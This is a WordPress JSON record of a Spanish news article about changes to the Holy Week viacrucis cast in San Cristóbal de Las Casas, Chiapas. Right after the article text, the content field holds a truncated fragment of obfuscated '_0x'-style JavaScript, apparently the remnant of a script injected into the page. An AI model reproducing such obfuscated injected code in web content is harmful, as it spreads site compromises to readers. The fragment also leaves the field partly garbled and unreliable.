{"id":14588,"date":"2024-03-09T02:35:33","date_gmt":"2024-03-09T02:35:33","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14588"},"modified":"2024-03-09T02:35:34","modified_gmt":"2024-03-09T02:35:34","slug":"realizaran-viacrucis-con-cambios-significativos-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14588","title":{"rendered":"Realizar\u00e1n Viacrucis con Cambios significativos en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240308-WA0010-1024x576.jpg\" alt=\"\" class=\"wp-image-14589\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240308-WA0010-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240308-WA0010-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240308-WA0010-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240308-WA0010-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240308-WA0010.jpg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- La Junta de la Cofrad\u00eda de la Asunci\u00f3n del Barrio de Mexicanos anunci\u00f3 hoy que, como parte de su tradici\u00f3n anual, llevar\u00e1n a cabo el viacrucis en San Crist\u00f3bal de Las Casas, con modificaciones significativas en su representaci\u00f3n.El presidente de la Junta de Festejos e integrante de la Cofrad\u00eda de la Asunci\u00f3n, Ciro Mazariegos, comparti\u00f3 que debido a diversas circunstancias, se realizar\u00e1n ajustes y cambios en la interpretaci\u00f3n de algunos personajes clave durante la representaci\u00f3n de la \u00faltima cena y el viacrucis.&#8221;El viernes santo, est\u00e1 programado el recorrido de la pasi\u00f3n de Cristo, partiendo de la plazuela de Mexicanos y transitando por las calles y avenidas de la ciudad, para finalizar de nuevo en la misma plazuela&#8221;.Y es que tras el fallecimiento de don Alberto Ar\u00e9valo, fundador de la Cofrad\u00eda y una figura central en esta actividad, se han designado nuevas personas para representar a los personajes b\u00edblicos. Don Alberto Ar\u00e9valo, quien representaba al capit\u00e1n de los soldados y a San Pedro ap\u00f3stol, deja un legado significativo en la historia de la Cofrad\u00eda.&#8221;En esta edici\u00f3n, H\u00e9ctor Cantoral ha sido seleccionado para interpretar el papel de Cristo, siendo un joven que se prepara para asumir este rol con responsabilidad y compromiso&#8221;.Se destac\u00f3 tambi\u00e9n la inclusi\u00f3n de nuevas mujeres que dar\u00e1n vida a las v\u00edrgenes durante las representaciones en la plazuela del barrio. Rayo de Jes\u00fas L\u00f3pez representar\u00e1 a la virgen Mar\u00eda y Julia del Carmen Aguilar Z\u00fa\u00f1iga ser\u00e1 Mar\u00eda Magdalena, marcando un cambio significativo en la representaci\u00f3n de estos personajes.&#8221;Las festividades iniciar\u00e1n el d\u00eda 28 de este mes, jueves santo, a las 9 de la noche, y continuar\u00e1n el viernes santo con el viacrucis por las calles de la ciudad. La celebraci\u00f3n del viacrucis en San Crist\u00f3bal de Las Casas este a\u00f1o promete ser memorable, con cambios significativos que reflejan la evoluci\u00f3n y continuidad de esta tradici\u00f3n arraigada en la comunidad del Barrio de Mexicanos&#8221;, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- La Junta de la Cofrad\u00eda de la Asunci\u00f3n del Barrio de Mexicanos anunci\u00f3 hoy que, como parte de su tradici\u00f3n anual, llevar\u00e1n a cabo el viacrucis en San Crist\u00f3bal de Las Casas, con modificaciones significativas en su representaci\u00f3n.El presidente de la Junta de Festejos e integrante de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14589,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-14588","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14588","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14588"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14588\/revisions"}],"predecessor-version":[{"id":14590,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14588\/revisions\/14590"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14589"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14588"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14588"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14588"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}